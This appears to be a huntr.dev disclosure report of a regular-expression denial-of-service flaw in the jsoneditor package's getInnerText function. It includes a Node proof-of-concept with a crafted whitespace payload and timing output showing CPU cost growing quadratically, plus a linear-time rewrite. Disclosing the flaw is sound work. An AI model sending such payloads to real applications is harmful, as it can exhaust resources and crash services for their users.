huntr / ready-research / 1E3ED803-B7ED-42F1-A4EA-C4C75DA9DE73
History: Sep 20, 2021 - 6:33 a.m.

Inefficient Regular Expression Complexity in josdejong/jsoneditor

2021-09-20 06:33:52
ready-research
www.huntr.dev

EPSS: 0.001 (Low), Percentile: 45.9%

✍️ Description

The jsoneditor package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted element as input to the getInnerText function may cause an application to consume an excessive amount of CPU.
The pinned line linked below is the one using the vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/josdejong/jsoneditor/blob/c33544bf7de6f4af05b58c4072e28bc786fb3f45/src/js/util.js#L403

Put the code below in a poc.js file and run it with node:

var regex = /\s*\n\s*/g;
for (var i = 1; i <= 500; i++) {
  var time = Date.now();
  // The payload contains no newline, so the leading \s* is expanded and
  // backtracked from every whitespace position: matching time grows quadratically.
  var payload = "A" + " ".repeat(i * 10000) + "Z";
  regex.test(payload);
  var time_cost = Date.now() - time;
  console.log("Trim time : " + payload.length + ": " + time_cost + " ms");
}

Check the Output:

Trim time : 10002: 102 ms
Trim time : 20002: 421 ms
Trim time : 30002: 927 ms
Trim time : 40002: 1693 ms
Trim time : 50002: 2659 ms
Trim time : 60002: 3945 ms
Trim time : 70002: 5472 ms
Trim time : 80002: 7407 ms
Trim time : 90002: 8342 ms
Trim time : 100002: 10267 ms
Trim time : 110002: 13306 ms
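As an added example (not the project's own code or its fix, and not part of the original report), the same trim done in a single linear-time pass next to the quadratic regex; it assumes the pattern is applied with replace to delete each newline together with the whitespace around it.

```javascript
// Added example (not jsoneditor's own code or fix): linear-time
// equivalent of the quadratic `/\s*\n\s*/g` trim.
const VULNERABLE_TRIM = /\s*\n\s*/g;

// Reference behaviour, kept for comparison only. On a long run of
// non-newline whitespace the leading \s* is re-expanded and backtracked
// from every position in the run, which is the quadratic cost the PoC times.
function trimWithRegex(text) {
  return text.replace(VULNERABLE_TRIM, '');
}

// Single-pass equivalent. The regex removes exactly those maximal
// whitespace runs that contain at least one '\n' and leaves every other
// run alone; scanning each character once gives O(n) regardless of input.
function trimLinear(text) {
  const ws = /\s/; // one-character test, cannot backtrack
  let out = '';
  let i = 0;
  while (i < text.length) {
    if (!ws.test(text[i])) {
      out += text[i];
      i += 1;
      continue;
    }
    let j = i;
    let hasNewline = false;
    while (j < text.length && ws.test(text[j])) {
      if (text[j] === '\n') hasNewline = true;
      j += 1;
    }
    if (!hasNewline) out += text.slice(i, j); // keep newline-free runs
    i = j;
  }
  return out;
}

// Constructed inputs, including one shaped like the PoC payload.
function demo() {
  const samples = [
    'A' + ' '.repeat(2000) + 'Z', // no newline: regex path is quadratic
    'a \n  b\t\n\nc',              // runs holding a newline are dropped
    '  x  ',                       // plain spaces are untouched
    '\n',
  ];
  return samples.map((s) => ({
    input: s.length,
    linear: trimLinear(s),
    agree: trimWithRegex(s) === trimLinear(s),
  }));
}
```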

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.
